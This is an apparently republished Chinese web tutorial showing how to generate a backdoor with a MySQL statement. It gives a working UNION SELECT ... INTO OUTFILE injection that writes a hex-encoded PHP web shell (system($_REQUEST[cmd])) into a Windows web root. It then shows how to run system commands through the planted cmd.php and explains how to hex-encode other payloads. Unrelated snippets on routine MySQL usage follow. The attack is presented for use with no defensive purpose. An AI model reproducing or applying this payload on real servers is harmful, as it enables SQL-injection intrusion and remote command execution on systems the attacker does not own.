通过Mysql的语句生成后门木马的方法

2016-01-29 15:05 2 1 收藏

通过Mysql的语句生成后门木马的方法,通过Mysql的语句生成后门木马的方法

【 tulaoshi.com - MySQL 】

 

通过Mysql 的语句生成后门木马的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?

再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/mysql/)

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

(本文来源于图老师网站,更多请访问https://www.tulaoshi.com/mysql/)

就是<?php system($_REQUEST[cmd]);?的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

 

来源:https://www.tulaoshi.com/n/20160129/1495200.html

延伸阅读
一、问题 要生成两类数据: A类:两位的 01 02 03 。。。09 10 11。。。19 20 21 。。。98 99 另一类B类:三位的 100 101 102 。。。110 111 112。。。998 999 二、解决办法 1、建表 代码如下: CREATE TABLE `test`.`ta` ( `a` varchar(45) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 2、创建存储过程 代码如下: DE...
代码如下: DELIMITER $$ CREATE FUNCTION `t_girl` . `func_rand_string` ( f_num tinyint unsigned , f_type tinyint unsigned ) RETURNS varchar ( 32) BEGIN -- Translate the number to letter. -- No 1 stands for string only. -- No 2 stands for number only. -- No 3 stands for combination of the above. declare i int ...
一、环境 OS:Linux myhostname 2.6.9-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux CentOS release 4.4 (Final) Oracle:Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod,数据库已经安装好 mysql:5.1.34-community for windows 二、安装配置 1. 安装unixODBC,用root用户 rpm -Uv...
一、INSERT和REPLACE INSERT和REPLACE语句的功能都是向表中插入新的数据。这两条语句的语法类似。它们的主要区别是如何处理重复的数据。 1. INSERT的一般用法 MySQL中的INSERT语句和标准的INSERT不太一样,在标准的SQL语句中,一次插入一条记录的INSERT语句只有一种形式。 INSERT INTO tablename(列名…) VALUES(列值); 而在MySQL中...
MySql没有提供top方法。可是他有limit方法提供同样的功能。 SELECT * FROM `tfidf` order by weight desc limit 1, 10830 SELECT * FROM `tfidf` order by weight desc limit 10

经验教程

466

收藏

57
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部